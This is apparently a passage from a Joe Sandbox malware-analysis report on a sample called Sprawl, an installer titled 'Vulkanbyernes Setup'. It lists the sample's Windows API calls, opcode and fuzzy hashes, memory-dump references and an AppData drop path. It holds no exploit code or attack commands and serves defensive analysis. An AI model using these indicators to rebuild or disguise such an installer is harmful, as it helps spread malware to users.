                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                            • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                                                            • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                                                            • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                            • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                                                            • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                                                            • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                                                            APIs
                                                                                                                            • GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemText
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3367045223-0
                                                                                                                            • Opcode ID: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                                            • Instruction ID: 5bc079f376c4397dc27e91e65bfdd94062f5f07280b0cdba8df2e4a8c8164f3b
                                                                                                                            • Opcode Fuzzy Hash: 318c761e7d03a4792b39f91a0403b49a68554c31ad0ac7f657822979c07e75a0
                                                                                                                            • Instruction Fuzzy Hash: 13B0927A908200BFCE025B40DD04E0ABF62BB98711F21C424F395640B086726022EB0A
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                                                                            • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                                            • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                                            • CreatePopupMenu.USER32 ref: 00405310
                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                                            • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                                            • EmptyClipboard.USER32 ref: 004053B0
                                                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                                                            • CloseClipboard.USER32 ref: 00405401
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 590372296-0
                                                                                                                            • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                                                            • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                                                            • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                                                            • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 0040211D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                                                            • API String ID: 123533781-1369816015
                                                                                                                            • Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                                                            • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                                            • Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                                                            • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFindFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1974802433-0
                                                                                                                            • Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                                                                            • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                                            • Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                                                                            • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                            • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                                                            • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                            • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                            • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                                                            • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                            • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                                                            APIs
                                                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                                                            • GetSysColor.USER32(?), ref: 0040412B
                                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                                                            • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                                                            • SetCursor.USER32(00000000), ref: 00404258
                                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                                                            • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                            • String ID: (@@$(N$N$Space available: $open
                                                                                                                            • API String ID: 3615053054-1322021202
                                                                                                                            • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                            • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                                            • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                            • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                                            APIs
                                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                            • DrawTextA.USER32(00000000,Vulkanbyernes Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                            • String ID: F$Vulkanbyernes Setup
                                                                                                                            • API String ID: 941294808-807586904
                                                                                                                            • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                            • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                                                            • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                            • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                                                            APIs
                                                                                                                            • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                                            • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
